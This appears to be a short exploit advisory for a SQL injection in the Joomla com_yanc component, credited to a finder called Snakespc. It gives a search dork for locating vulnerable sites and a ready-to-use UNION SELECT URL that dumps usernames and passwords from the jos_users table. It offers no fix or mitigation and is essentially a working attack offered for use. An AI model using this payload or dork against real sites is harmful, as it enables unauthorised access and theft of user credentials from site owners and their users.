15 lines
No EOL
799 B
Text
15 lines
No EOL
799 B
Text
==============================================================================
|
|
[»] Joomla com_yanc Remote Sql Injection Vulnerability
|
|
==============================================================================
|
|
|
|
[»] Script: [Joomla]
|
|
[»] Language: [ PHP ]
|
|
[»] Founder: [ Snakespc Email:super_cristal@hotmail.com - Site:sec-war.com/cc> ]
|
|
[»] Greetz to:[ His0k4, PrEdAtOr >>> All My Mamber >> sec-war.com/cc ]
|
|
[»] Dork: [inurl:index.php?option=com_yanc "listid" ]
|
|
###########################################################################
|
|
===[ Exploit ]===
|
|
|
|
[»] http://server/index.php?option=com_yanc&Itemid=75&listid=-2+UNION SELECT concat(username,0x3a,password),2+from+jos_users--
|
|
[»]Author: Snakespc <-
|
|
########################################################################### |